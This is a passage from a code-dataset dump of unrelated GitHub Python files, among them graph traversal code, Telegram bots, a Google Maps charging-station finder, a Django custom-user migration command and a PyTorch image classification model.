tm)\n\n\t\telif tm.tm_mon != now.tm_mon:\n\t\t\t# Message is not from current month\n\t\t\t# Format: \"12. May 20:32\"\n\t\t\treturn time.strftime(\"%m %b %H:%M\", tm)\n\n\t\t# Message date is within current month...\n\t\tdaydiff = abs(tm.tm_mday - now.tm_mday)\n\n\t\tif daydiff > 5:\n\t\t\t# Message is older than 5 days\n\t\t\t# Format: \"12. May 20:32\"\n\t\t\treturn time.strftime(\"%m %b %H:%M\", tm)\n\t\telif daydiff > 1:\n\t\t\t# Message is older than yesterday\n\t\t\t# Format: \"Monday 20:32\"\n\t\t\treturn time.strftime(\"%A %H:%M\", tm)\n\t\telif daydiff == 1:\n\t\t\t# Message is from yesterday\n\t\t\t# Format: \"yesterday 20:32\"\n\t\t\treturn time.strftime(\"yesterday %H:%M\", tm)\n\n\t\t# Message is from today\n\t\treturn time.strftime(\"%H:%M\", tm)\n\n\n\tdef __prev_msg_index(self):\n\t\t\"\"\"\\\n\t\tReturns index of beginning of previous\n\t\tmessage in self.lines starting at self.cy.\n\t\tIf no previous message exists, None is returned.\n\t\t\"\"\"\n\t\ty = self.cy-1\n\t\twhile y >= 0:\n\t\t\tif self.lines[y][0]:\n\t\t\t\treturn y\n\t\t\ty -= 1\n\t\treturn None\n\n\tdef __next_msg_index(self):\n\t\t\"\"\"\\\n\t\tReturns index of beginning of next\n\t\tmessage in self.lines starting at self.cy.\n\t\tIf no next message exists, None is returned.\n\t\t\"\"\"\n\t\ty = self.cy+1\n\t\twhile y < len(self.lines):\n\t\t\tif self.lines[y][0]:\n\t\t\t\treturn y\n\t\t\ty += 1\n\t\treturn None\n\n\tdef __last_msg_index(self):\n\t\t\"\"\"\\\n\t\tGet index of last message.\n\t\t\"\"\"\n\t\ty = len(self.lines)-1\n\t\twhile y >= 0:\n\t\t\tif self.lines[y][0]:\n\t\t\t\treturn y\n\t\t\ty -= 1\n\t\treturn None\n\n\n\tdef __selected_msg_nlines(self):\n\t\t\"\"\"\\\n\t\tGet the number of lines, the currently\n\t\tselected message is using (without headline).\n\t\t\"\"\"\n\t\tprefixes = (\"/M/M/M\",\"/U/U/U\")\n\t\ty = self.cy+1\n\t\tn = 0\n\t\tfor line in self.lines[y:]:\n\t\t\tif line[0] or line[1] in prefixes:\n\t\t\t\treturn n\n\t\t\tn += 1\n\t\treturn n\n\n\tdef __adjust_view(self):\n\t\t\"\"\"\\\n\t\tAdjusts the view (self.vy) that currently\n\t\tselected message (self.cy) is within viewport.\n\t\t\"\"\"\n\t\th,w = self.W.getmaxyx()\n\t\th -= 3\n\n\t\tif self.cy < self.vy:\n\t\t\tself.vy = self.cy\n\n\t\telif self.cy >= self.vy+h:\n\t\t\t# Set view index, that we can see\n\t\t\t# the selected message completely.\n\t\t\tnlines = self.__selected_msg_nlines()\n\t\t\tself.vy = self.cy-h+nlines+1\n\n\t\tself.changed = True\n","repo_name":"lukwies/retro-client","sub_path":"retro_client/ChatMsgWindow.py","file_name":"ChatMsgWindow.py","file_ext":"py","file_size_in_byte":10156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32644472827","text":"graph = {\n '5': ['3', '7'],\n '3': ['2', '4'],\n '7': ['8'],\n '2': [],\n '4': ['8'],\n '8': []\n}\n\n\nclass Graph:\n def __init__(self, graph):\n self.graph = graph\n self.bfs = []\n self.dfs = []\n\n def calculate_bfs(self, head):\n queue = []\n visited = set()\n queue.append(head)\n visited.add(head)\n self.bfs.append(head)\n while queue:\n first_node = queue.pop(0)\n for neighbour in self.graph[first_node]:\n if neighbour not in visited:\n self.bfs.append(neighbour)\n visited.add(neighbour)\n queue.append(neighbour)\n\n def calculate_dfs(self, head, visited):\n visited.add(head)\n for item in self.graph[head]:\n if item not in visited:\n self.dfs.append(item)\n self.calculate_dfs(item, visited=visited)\n\n def numIslands(self, grid):\n count = 0\n for i in range(0, len(grid)):\n for j in range(0, len(grid)):\n if grid[i][j] == '1':\n if i > 0 and grid[i-1][j] == '1':\n continue\n elif j > 0 and grid[i][j-1] == '1':\n continue\n elif i < len(grid)-1 and grid[i+1][j] == '1':\n continue\n elif j < len(grid)-1 and grid[i][j+1] == '1':\n continue\n else:\n count += 1\n return count+1\n\n\nobj = Graph(graph=graph)\nobj.calculate_bfs('5')\nobj.dfs.append('5')\nobj.calculate_dfs('5', set())\nprint(obj.bfs)\nprint(obj.dfs)\n\n","repo_name":"Dhananjay09/Coding-Questions","sub_path":"graph/bfs.py","file_name":"bfs.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31150258463","text":"import sqlite3\nfrom collections import OrderedDict\nfrom itertools import islice\nimport pandas\nimport re\nimport io\nimport codecs\nimport os\n\n\ndef read_articles(table):\n conn = sqlite3.connect('../sites/example.db')\n c = conn.cursor()\n # c.execute(\"SELECT description FROM \" + table + \" Limit 10\")\n c.execute(\"SELECT description FROM \" + table)\n print(c.fetchone())\n articles = c.fetchall()\n conn.commit()\n conn.close()\n return articles\n\n\ndef example_article(table):\n conn = sqlite3.connect('../sites/example.db')\n c = conn.cursor()\n c.execute(\"SELECT description FROM \" + table + \" Limit 2\")\n # c.execute(\"SELECT description FROM \" + table)\n article = c.fetchall()[0]\n conn.commit()\n conn.close()\n return article\n\n\ndef get_train(records):\n records.extend(read_articles('forumzdrowia'))\n # records.extend(read_articles('doz'))\n # records.extend(read_articles('poradnikzdrowie'))\n # records.extend(read_articles('articles'))\n for i, record in enumerate(records):\n records[i] = prepare_article(record[0])\n # print(records)\n return records\n\ndef get_forbiddens():\n forbiddens = ['bo', 'abd', 'się', 'są', 'które', 'który', 'że', 'żeby', 'być', 'stać', 'mieć', 'posiadać',\n 'mogą', 'jeśli', 'też', 'może', 'to',\n 'także', 'również']\n # forbiddens=[]\n f = open('forbidden_stop', 'r', encoding='utf-8-sig')\n forbiddens.extend(f.read().splitlines())\n f.close()\n # import pprint\n # pprint.pprint(forbiddens)\n # print(forbiddens)\n return forbiddens\n\n\ndef prepare_article(article):\n # article = re.sub('[().,-:/]', '', article).lower()\n # # article = re.sub('y$', 'a', article[0])\n # # article = re.sub('\\d+', '', article[0])\n # article_list = [word.lower() for word in article.split()]\n # forbiddens = get_forbiddens()\n # for i, word in enumerate(article_list):\n # if word in forbiddens:\n # del article_list[i]\n # else:\n # article_list[i] = unify_token(word)\n\n return article\n # return islice(OrderedDict(counter), 3)\n\nfrom sklearn import neural_network\ndef unify_token(token):\n # results = os.system('cat morfologik.txt | less /' + token)\n\n with open('morfologik.txt', 'r', encoding='utf-8-sig') as infile:\n for line in infile:\n line_content = line.split(sep=';')\n if token == line_content[1]:\n return line_content[0]\n return token\n\nfrom sklearn import svm\n# print(unify_token('alkoholowa'))\n\n# result = get_train(read_articles('doz'))\nprint(prepare_article('Przeciwciała anty-TPO nie występują we krwi osoby zdrowej, dlatego ich obecność zawsze zwiastuje choroby tarczycy. Aby dowiedzieć się, na które schorzenie wskazują przeciwciała, należy oznaczyć ich stężenie we krwi. Sprawdź, na czym polega badanie przeciwciał anty-TPO, jakie są wskazania do badania i jak interpretować wyniki badań.'))\n","repo_name":"Karolucha/magisterka","sub_path":"learn/reader.py","file_name":"reader.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23016973521","text":"from aiogram.types import InlineKeyboardMarkup, InlineKeyboardButton\n\n\nmenu = InlineKeyboardMarkup(row_width=1)\nbtnProfile = InlineKeyboardButton(text=\"Profile 👤\", callback_data='btnProfile')\nbtnRequests = InlineKeyboardButton(text=\"Requests 🗄\", callback_data='btnRequests')\nmenu.add(btnProfile, btnRequests)\n\n\nbtnBack = InlineKeyboardButton(text=\"Back\", callback_data='btnBack')\n\nback_user_requests = InlineKeyboardMarkup(row_width=1)\nbtnBackUserRequests = InlineKeyboardButton(text=\"Back\", callback_data='btnBackUserRequests')\nback_user_requests.add(btnBackUserRequests)\n\nback_artist_requests = InlineKeyboardMarkup(row_width=1)\nbtnBackArtistRequests = InlineKeyboardButton(text=\"Back\", callback_data='btnBackArtistRequests')\nback_artist_requests.add(btnBackArtistRequests)\n\n\nuser_profile_menu = InlineKeyboardMarkup(row_width=1)\nbtnSubscribe = InlineKeyboardButton(text=\"Subscribe 🧑‍🎨\", callback_data='btnSubscribe')\nuser_profile_menu.add(btnSubscribe, btnBack)\n\nuser_requests_menu = InlineKeyboardMarkup(row_width=1)\nbtnShowMyRequests = InlineKeyboardButton(text=\"Show my requests 🗃\", callback_data='btnShowMyRequests')\nbtnSendRequest = InlineKeyboardButton(text=\"Send request 🖼\", callback_data='btnSendRequest')\nuser_requests_menu.add(btnShowMyRequests, btnSendRequest, btnBack)\n\n\nartist_profile_menu = InlineKeyboardMarkup(row_width=2)\nbtnEditProfile = InlineKeyboardButton(text=\"Edit profile ✍️\", callback_data='btnEditProfile')\nbtnUnSubscribe = InlineKeyboardButton(text=\"Unsubscribe 😶‍🌫️\", callback_data='btnUnSubscribe')\nartist_profile_menu.add(btnEditProfile, btnUnSubscribe, btnBack)\n\nartist_requests_menu = InlineKeyboardMarkup(row_width=1)\nbtnShowFreeRequests = InlineKeyboardButton(text=\"Show free requests 🗄\", callback_data='btnShowFreeRequests')\nbtnShowAcceptedRequests = InlineKeyboardButton(text=\"Show accepted requests 📇\", callback_data='btnShowAcceptedRequests')\nartist_requests_menu.add(btnShowFreeRequests, btnShowAcceptedRequests, btnShowMyRequests, btnSendRequest, btnBack)\n\n\nconf_menu = InlineKeyboardMarkup(row_width=2)\nbtnConfYes = InlineKeyboardButton(text=\"Yes\", callback_data='btnConfYes')\nbtnConfNo = InlineKeyboardButton(text=\"No\", callback_data='btnConfNo')\nconf_menu.add(btnConfYes, btnConfNo)\n\n\nnot_accepted_request = InlineKeyboardMarkup(row_width=2)\nbtnAccept = InlineKeyboardButton(text=\"Accept\", callback_data='btnAccept')\nbtnClose = InlineKeyboardButton(text=\"Close\", callback_data='btnClose')\nnot_accepted_request.add(btnAccept, btnClose)\n\naccepted_request = InlineKeyboardMarkup(row_width=2)\nbtnCompleted = InlineKeyboardButton(text=\"Completed\", callback_data='btnCompleted')\naccepted_request.add(btnCompleted, btnClose)\n","repo_name":"em7te/telegram_bot_registr","sub_path":"markup.py","file_name":"markup.py","file_ext":"py","file_size_in_byte":2704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3538715799","text":"from opensimplex import OpenSimplex\nimport matplotlib.pyplot as plt\n\ndef heightmap(n):\n noise = OpenSimplex()\n z = [[0 for x in range(n)] for y in range(n)]\n for i in range(n):\n for j in range(n):\n z[i][j] = (noise.noise2d(((i + 1) / 10), ((j + 1) / 10)) + 1) * 10\n return z\n\nz = heightmap(100)\n\nmap = plt.imshow(z, cmap='terrain')\nplt.show()","repo_name":"enesdemirag/programming-exercises","sub_path":"exercises/materials/perlin-noise/demo2.py","file_name":"demo2.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"77"} +{"seq_id":"11797553803","text":"\"\"\"\nInstructions to run script manually:\n1) launch django shell (./manage shell)\n2) import this module (from volt_finder import mygooglemaps as g)\n\"\"\"\n\nimport googlemaps\nfrom datetime import datetime\nimport json\nfrom dataclasses import dataclass\n\n# Settings used by Django\n#from django.conf import settings\n#gmaps = googlemaps.Client(key= settings.GOOGLE_API_KEY)\n\n# Settings to run script manually\nimport os\nGOOGLE_API_KEY = os.getenv('V2GO_GOOGLE_API_KEY')\ngmaps = googlemaps.Client(key= GOOGLE_API_KEY)\n\n# Transportation mode\nmymode = \"driving\" #\"transit\" # \"walking\"\njsonDumpDir = 'volt_finder/x_scrap_stuff/jsonDump.json'\nsampleCS = [\"160 Rue Saint Viateur E, Montréal, QC H2T 1A8\",\n \"145 Mont-Royal Ave E, Montreal, QC H2T 1N9\",\n \"1735 Rue Saint-Denis, Montréal, QC H2X 3K4\",\n \"2153 Mackay St, Montreal, QC H3G 2J2\",\n \"3515 Avenue Lacombe, Montréal, QC H3T 1M2\",\n \"5265 Queen Mary Rd, Montreal, QC H3W 1Y3\",\n \"191 Place du Marché-du-Nord, Montréal, QC H2S 1A2\",\n \"1999 Mont-Royal Ave E, Montreal, QC H2H 1J4\",\n \"545 Milton St, Montreal, QC H2X 1W5\",\n \"1999 Mont-Royal Ave E, Montreal, QC H2H 1J4\",\n \"432 Rue Rachel E, Montréal, QC H2J 2G7\"\n]\n\n\"\"\" Helpers \"\"\"\ndef printParams():\n print(\"--- Params ---\")\n print(\"Transport mode: \", mymode)\n print(\"Json dump directory: \", jsonDumpDir)\n print(\"Sample CS: \", sampleCS)\n\ndef dumpJsonFile(jdata):\n \"\"\" Takes a json or array and ourputs into a Json File \"\"\"\n with open(jsonDumpDir, 'w') as json_file:\n json.dump(jdata, json_file)\n return \"File saved\"\n\ndef printTripSummary(direc):\n \"\"\" Takes direction service outpu as input, prints summary info\"\"\"\n print(\"--- Trip Info ---\")\n print(\"From: \", direc[0][\"legs\"][0][\"start_address\"])\n print(\"To: \", direc[0][\"legs\"][0][\"end_address\"])\n print(\"Distance: \", direc[0][\"legs\"][0][\"distance\"][\"text\"])\n print(\"Duration: \", direc[0][\"legs\"][0][\"duration\"][\"text\"])\n\n@dataclass\nclass CStation:\n \"\"\"CStationnt of Interest data class, for Distance Matrix output\"\"\"\n nk: str\n destination_addresses: str\n duration_txt: str\n duration_val: int\n distance_txt: str\n distance_val: int\n status: str\n\n\ndef format_output_cs(addr, elem):\n # formated_cs = {\n # 'nk': 'err...whats that',\n # 'destination_addresses': addr,\n # 'duration_txt': elem['duration']['text'],\n # 'duration_val': elem['duration']['value'],\n # 'distance_txt': elem['distance']['text'],\n # 'distance_val': elem['distance']['value'],\n # 'status': elem['status'] \n # }\n # Use CStation data class object (requires serialization before the view Responds to client)\n formated_cs = CStation(\n 'no_nk',\n addr, \n elem['duration']['text'], \n elem['duration']['value'],\n elem['distance']['text'], \n elem['distance']['value'],\n elem['status']\n )\n return formated_cs\n \n\n \n\"\"\" Main func \"\"\"\n\ndef getDirections(departure, destination):\n \"\"\" \n Returns the directions to get from departure (A) to departure (B)\n Input: 2 locations (address or coordinates) as string \n Output: Json formated Directions, but as an array.\n \"\"\"\n now = datetime.now()\n directions_result = gmaps.directions(\n departure, destination, mode = mymode, departure_time = now)\n return directions_result\n\ndef getNearestCS(poi, charginStations):\n \"\"\" Gets the top X nearest CS from user provided location.\n :param poi: the point of interestes, a single location provided by the user \n :param charginStations: array of CS locations \n \"\"\"\n resp = gmaps.distance_matrix(poi, charginStations)\n \n #TODO: replace this if /else for try/except\n if resp['status']!='OK':\n return \"Error\"\n else:\n result = []\n for addr, elem in zip(resp['destination_addresses'], resp[\"rows\"][0]['elements']):\n temp_CStation = format_output_cs(addr, elem)\n result.append(temp_CStation)\n\n # Sort CS by duration (lower first)\n result.sort(key=lambda x: x.duration_val, reverse=False)\n\n # Retrun top 5 results\n if len(result) > 5:\n return result[:5]\n else:\n return result \n\n","repo_name":"AdrianFerJ/v2go-api","sub_path":"django-server/api_django/volt_finder/mygooglemaps.py","file_name":"mygooglemaps.py","file_ext":"py","file_size_in_byte":4319,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29422958469","text":"def suma_divisores(x):\n suma=0\n valor=1\n for i in range(1,(x//2)+1):\n if x%i==0:\n suma+=i\n return suma\n\ndef amigos(x,y):\n if x == suma_divisores(y) and y == suma_divisores(x):\n return True\n else:\n return False\n\nif __name__==\"__main__\":\n a=int(input(\"Ingrese un numero: \"))\n b=int(input(\"Ingrese otro numero:\"))\n numeros_amigos(a,b)","repo_name":"pabloschwarzenberg/grader","sub_path":"tema2_ej2/tema2_ej2_frvega.py","file_name":"tema2_ej2_frvega.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29136965693","text":"from telegram.ext import *\nfrom telegram import *\nimport logging\nimport os\nfrom dotenv import load_dotenv\nload_dotenv()\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.INFO)\ntoken = os.getenv('BOT_TOKEN')\nupdater = Updater(token=token, use_context=True)\ndispatcher = updater.dispatcher\n\ncurrent_user = {}\nCLASS_DATA = {}\nCLASS_PART = {}\nCLASS_CODES = {\"T15\": \"9210\",\n \"T16\": \"9211\"}\nALL_CLASSES = [\"T15\", \"T16\"]\n\nfor c in ALL_CLASSES:\n CLASS_DATA[c] = []\n CLASS_PART[\"participation_\" + c] = []\n\ndef start(update, context):\n buttons = []\n for each_class in ALL_CLASSES:\n buttons.append([InlineKeyboardButton(\"Register Attendance for \" + each_class, callback_data=each_class)])\n buttons.append([InlineKeyboardButton(\"Register Participation for \" + each_class, callback_data=\"participation_\" + each_class)])\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"What may I do for you today?\",\n reply_markup=InlineKeyboardMarkup(buttons))\n\ndef write_to_txt(tut, type):\n if type == \"T\":\n file = open(tut + \".txt\", \"w+\")\n for name in CLASS_DATA[tut]:\n file.write(name + \"\\n\")\n else:\n file = open(tut + \"Part.txt\", \"w+\")\n for name in CLASS_PART[\"participation_\" + tut]:\n file.write(name + \"\\n\")\n\ndef inline_query(update, context):\n query = update.callback_query.data\n update.callback_query.answer()\n context.bot.edit_message_reply_markup(\n message_id = update.callback_query.message.message_id,\n chat_id = update.callback_query.message.chat.id,\n reply_markup=None)\n current_user[update.effective_chat.id] = {}\n if query.startswith(\"participation_\"):\n current_user[update.effective_chat.id]['class'] = query.split(\"_\")[1]\n else:\n current_user[update.effective_chat.id]['class'] = query\n if query.startswith(\"participation_\"):\n current_user[update.effective_chat.id]['state'] = \"participation\"\n context.bot.send_message(chat_id=update.effective_chat.id,\n text=\"Please type in your name.\")\n else:\n context.bot.send_message(chat_id=update.effective_chat.id,\n text=\"Please type in the code followed by your name\\nE.g. 1001 William Lee\")\n\ndef message_handler(update, context):\n global current_user\n if current_user.get(update.effective_chat.id) is None or current_user[update.effective_chat.id].get('class') is None:\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"If you'd like to register your attendance, please choose your class first.\")\n msg = update.message.text\n curr_class = current_user[update.effective_chat.id]['class']\n if current_user[update.effective_chat.id].get('state') == \"participation\":\n CLASS_PART[\"participation_\" + curr_class].append(msg)\n CLASS_PART[\"participation_\" + curr_class].sort()\n write_to_txt(curr_class, \"P\")\n context.bot.send_message(chat_id=update.effective_chat.id, text=msg + \" registered!\")\n current_user[update.effective_chat.id]['state'] = \"registered_participation\"\n else:\n password = CLASS_CODES.get(curr_class)\n if msg.startswith(password):\n name = msg.split(password + \" \")[1]\n CLASS_DATA[curr_class].append(name)\n CLASS_DATA[curr_class].sort()\n write_to_txt(curr_class, \"T\")\n context.bot.send_message(chat_id=update.effective_chat.id, text=name + \" registered!\")\n print(\"Total: \" + str(len(CLASS_DATA[curr_class])))\n else:\n context.bot.send_message(chat_id=update.effective_chat.id, text=\"Wrong code/format, include a space after the code if you forgot to.\")\n\nstart_handler = CommandHandler('start', start)\ndispatcher.add_handler(start_handler)\n\nquery_handler = CallbackQueryHandler(inline_query)\ndispatcher.add_handler(query_handler)\n\ncatchall_handler = MessageHandler(Filters.text, message_handler)\ndispatcher.add_handler(catchall_handler)\n\nupdater.start_polling()\nupdater.idle()\n","repo_name":"seanmanik/Attendance-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17497201236","text":"from __future__ import absolute_import, unicode_literals\n\nimport inspect\n\nfrom django.apps import apps\nfrom django.core.management.base import BaseCommand\nfrom django.db import models\nfrom django.db.migrations import Migration\nfrom django.db.migrations.autodetector import MigrationAutodetector\nfrom django.db.migrations.loader import MigrationLoader\nfrom django.db.migrations.state import ProjectState\nfrom django.db.migrations.writer import MigrationWriter\n\nfrom django_custom_user_migration.utils import (empty_table, fetch_with_column_names, get_max_id,\n make_table_name, populate_table, reset_sequence)\n\n\nclass CustomUserCommand(BaseCommand):\n\n def add_arguments(self, parser):\n parser.add_argument(\"source_model\")\n parser.add_argument(\"destination_model\")\n\n def handle(self, *args, **options):\n source_model = options['source_model']\n destination_model = options['destination_model']\n from_app_label, from_model_name = source_model.split(\".\")\n to_app_label, to_model_name = destination_model.split(\".\")\n self.handle_custom_user(from_app_label, from_model_name, to_app_label, to_model_name)\n\n def create_runpython_migration(self, app_label, forwards_backwards, extra_functions,\n extra_dependencies=None):\n\n # Copy source code, so that we can uninstall this helper app\n # and the migrations still work.\n extra_func_code = \"\\n\\n\".join(inspect.getsource(f)\n for f in extra_functions)\n\n loader = MigrationLoader(None, ignore_no_migrations=True)\n autodetector = MigrationAutodetector(\n loader.project_state(),\n ProjectState.from_apps(apps),\n None,\n )\n\n changes = {\n app_label: [Migration(\"custom\", app_label)]\n }\n changes = autodetector.arrange_for_graph(\n changes=changes,\n graph=loader.graph,\n )\n\n for app_label, app_migrations in changes.items():\n for migration in app_migrations:\n if extra_dependencies is not None:\n migration.dependencies.extend(extra_dependencies)\n writer = MigrationWriter(migration)\n\n migration_string = writer.as_string().decode('utf-8')\n\n # Add support functions:\n migration_string = migration_string.replace(\"\\nclass Migration\",\n forwards_backwards + \"\\n\\n\" +\n extra_func_code + \"\\n\\n\" +\n \"\\nclass Migration\")\n\n # Add operations:\n migration_string = migration_string.replace(\n \"operations = [\",\n \"operations = [\\n\"\n \" migrations.RunPython(forwards, backwards),\")\n with open(writer.path, \"wb\") as fh:\n fh.write(migration_string.encode('utf-8'))\n\n\nclass CustomUserPopulateCommand(CustomUserCommand):\n\n def create_populate_migration(self, from_app_label, from_model_name,\n to_app_label, to_model_name, reverse=False):\n populate_template = \"\"\"\n populate_table(apps, schema_editor,\n \"{from_app}\", \"{from_model}\",\n \"{to_app}\", \"{to_model}\")\"\"\"\n empty_template = \"\"\"\n empty_table(apps, schema_editor,\n \"{to_app}\", \"{to_model}\")\"\"\"\n\n forwards_backwards_template = \"\"\"\ndef forwards(apps, schema_editor):{forwards}\n\n\ndef backwards(apps, schema_editor):{backwards}\n\"\"\"\n\n from_model = apps.get_model(from_app_label, from_model_name)\n to_model = apps.get_model(to_app_label, to_model_name)\n if reverse:\n from_model, to_model = to_model, from_model\n\n # We need to populate the model table, but also the automatically\n # created M2M tables from the corresponding table on the source model\n model_pairs = [((from_model._meta.app_label, from_model.__name__),\n (to_model._meta.app_label, to_model.__name__))]\n\n for from_f in from_model._meta.get_fields(include_hidden=True):\n if not isinstance(from_f, models.ManyToManyField):\n continue\n to_f = to_model._meta.get_field(from_f.name)\n\n # When auth.User has been swapped out, the f.rel.through attribute\n # becomes None. So we have to build the name manually.\n make_name = lambda f: \"{0}_{1}\".format(f.model.__name__, f.name)\n model_pairs.append(((from_model._meta.app_label, make_name(from_f)),\n (to_model._meta.app_label, make_name(to_f))))\n\n populate = \"\"\n empty = \"\"\n for ((from_a, from_m), (to_a, to_m)) in model_pairs:\n populate += populate_template.format(\n from_app=from_a,\n from_model=from_m,\n to_app=to_a,\n to_model=to_m,\n )\n\n # Empty in reverse order i.e. M2M tables first\n for ((from_a, from_m), (to_a, to_m)) in reversed(model_pairs):\n empty += empty_template.format(\n from_app=from_a,\n from_model=from_m,\n to_app=to_a,\n to_model=to_m,\n )\n\n if not reverse:\n data = {'forwards': populate,\n 'backwards': empty,\n }\n else:\n data = {'forwards': empty,\n 'backwards': populate,\n }\n forwards_backwards = forwards_backwards_template.format(**data)\n\n self.create_runpython_migration(to_app_label, forwards_backwards,\n [populate_table, empty_table, make_table_name,\n fetch_with_column_names, get_max_id,\n reset_sequence])\n","repo_name":"spookylukey/django_custom_user_migration","sub_path":"django_custom_user_migration/management/commands/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6064,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"39723845404","text":"\ndef paper(dims):\n l, w, h = dims\n return 2*l*w + 2*w*h + 2*l*h + min(l*w, w*h, l*h)\n\ndef ribbon(dims):\n l, w, h = dims\n return l*w*h + min(2*(l+w), 2*(w+h), 2*(l+h))\n\nif __name__ == \"__main__\":\n with open('day02/input.txt') as f:\n all_dims = list(tuple(map(int, line.split('x'))) for line in f.read().splitlines())\n\n print('--- Part 1 ---')\n print(sum(paper(dims) for dims in all_dims))\n print('--- Part 2 ---')\n print(sum(ribbon(dims) for dims in all_dims))\n","repo_name":"drewhayward/advent-of-code-2015","sub_path":"day02/paper.py","file_name":"paper.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8556240990","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torchvision import models\nimport pretrainedmodels\nimport easydict as edict\nimport numpy as np\n# from efficientnet_pytorch import EfficientNet \n\nimport os\nimport models.pooling as pooling\nfrom models.metric_learning import *\nfrom models.resnet import *\nfrom models.densenet import *\nfrom models.efficient import *\n\nclass AdaptiveConcatPool2d(nn.Module):\n def __init__(self):\n super().__init__()\n self.ap = nn.AdaptiveAvgPool2d(1)\n self.mp = nn.AdaptiveMaxPool2d(1)\n def forward(self, x): return torch.cat([self.mp(x), self.ap(x)], 1)\n\n\nclass Flatten(nn.Module):\n def __init__(self): super().__init__()\n def forward(self, x): return x.view(x.size(0), -1) \n\n\ndef create_new_conv(trained_kernel):\n trained_kernel_weights = trained_kernel.weight \n\n new_conv = nn.Conv2d(in_channels=6, \n out_channels=trained_kernel.out_channels, \n kernel_size=trained_kernel.kernel_size, \n stride=trained_kernel.stride, \n padding=trained_kernel.padding, \n bias=False)\n\n with torch.no_grad():\n new_conv.weight[:,:] = torch.stack([torch.mean(trained_kernel_weights, 1)]*6, dim=1)\n\n return new_conv\n\ndef resnet_remove_head(backbone): \n # change first filter\n trained_kernel = backbone.conv1\n backbone.conv1 = create_new_conv(trained_kernel)\n\n # get in_features\n final_in_features = backbone.fc.in_features \n\n # remove head\n backbone = nn.Sequential(*list(backbone.children())[:-2])\n\n return backbone, final_in_features\n\n\ndef desnet_remove_head(backbone):\n trained_kernel = backbone.features.conv0 \n backbone.features.conv0 = create_new_conv(trained_kernel)\n\n final_in_features = backbone.classifier.in_features\n\n backbone = nn.Sequential(*list(backbone.features)[:-1])\n\n return backbone, final_in_features\n\n\ndef effnet_remove_head(backbone, model_name): \n trained_kernel = backbone._conv_stem\n\n trained_kernel_weights = trained_kernel.weight \n\n new_conv = Conv2dStaticSamePadding(in_channels=6, \n out_channels=trained_kernel.out_channels, \n kernel_size=trained_kernel.kernel_size, \n stride=trained_kernel.stride,\n image_size=EfficientNet.get_image_size(model_name),\n bias=False)\n \n with torch.no_grad():\n new_conv.weight[:,:] = torch.stack([torch.mean(trained_kernel_weights, 1)]*6, dim=1)\n\n backbone._conv_stem = new_conv\n\n final_in_features = backbone._fc.in_features\n\n # backbone = nn.Sequential(*list(backbone.children())[:-2])\n\n return backbone, final_in_features \n\n\nclass RecursionNet(nn.Module):\n\n def __init__(self, num_classes, model_name='resnet18', \n fc_dim=512, loss_module='softmax', antialias=True, filter_size=5):\n super(RecursionNet, self).__init__() \n \n if antialias: # only supports resnet18's weights\n self.backbone = globals().get(model_name)(filter_size=filter_size)\n\n file_name = 'weights/{0}_lpf{1}.pth.tar'.format(model_name, filter_size)\n if not os.path.exists(file_name):\n raise ValueError('Weights not available!')\n \n if torch.cuda.is_available(): \n self.backbone.load_state_dict(torch.load(file_name)['state_dict'])\n else:\n self.backbone.load_state_dict(torch.load(file_name, map_location=torch.device('cpu'))['state_dict'])\n\n if 'resnet' in model_name:\n self.backbone, final_in_features = resnet_remove_head(self.backbone)\n elif 'dense' in model_name:\n self.backbone, final_in_features = desnet_remove_head(self.backbone)\n else:\n raise ValueError('Only resnet and densenet121 supported for antialias!')\n \n else:\n if 'dense' in model_name:\n self.backbone = getattr(pretrainedmodels, model_name)(num_classes=1000) \n self.backbone, final_in_features = desnet_remove_head(self.backbone)\n\n elif 'efficient' in model_name:\n raise NotImplementedError\n # self.backbone = EfficientNet.from_pretrained(model_name, num_classes=num_classes)\n # self.backbone, final_in_features = effnet_remove_head(self.backbone, model_name)\n\n elif 'resnet' in model_name:\n raise NotImplementedError\n\n else:\n raise ValueError('Only densenet and efficientnet supported!')\n \n self.pooling = AdaptiveConcatPool2d()\n self.flatten = Flatten() \n self.bn1 = nn.BatchNorm1d(final_in_features * 2)\n self.fc1 = nn.Linear(final_in_features * 2, final_in_features)\n self.relu = nn.ReLU(inplace=True)\n self.bn2 = nn.BatchNorm1d(final_in_features) \n self.dropout1 = nn.Dropout(p=0.25)\n self._init_params() \n\n if loss_module == 'arcface':\n self.final = ArcMarginProduct(final_in_features, num_classes)\n elif loss_module == 'cosface':\n self.final = AddMarginProduct(final_in_features, num_classes)\n elif loss_module == 'adacos':\n self.final = AdaCos(final_in_features, num_classes)\n elif loss_module == 'sphereface':\n self.final = SphereProduct(final_in_features, num_classes)\n elif loss_module == 'amsoftmax':\n self.final = AdaptiveMargin(final_in_features, num_classes)\n else:\n self.final = nn.Linear(final_in_features, num_classes)\n\n def _init_params(self):\n nn.init.kaiming_normal_(self.fc1.weight)\n nn.init.constant_(self.fc1.bias, 0)\n nn.init.constant_(self.bn1.weight, 1)\n nn.init.constant_(self.bn1.bias, 0)\n 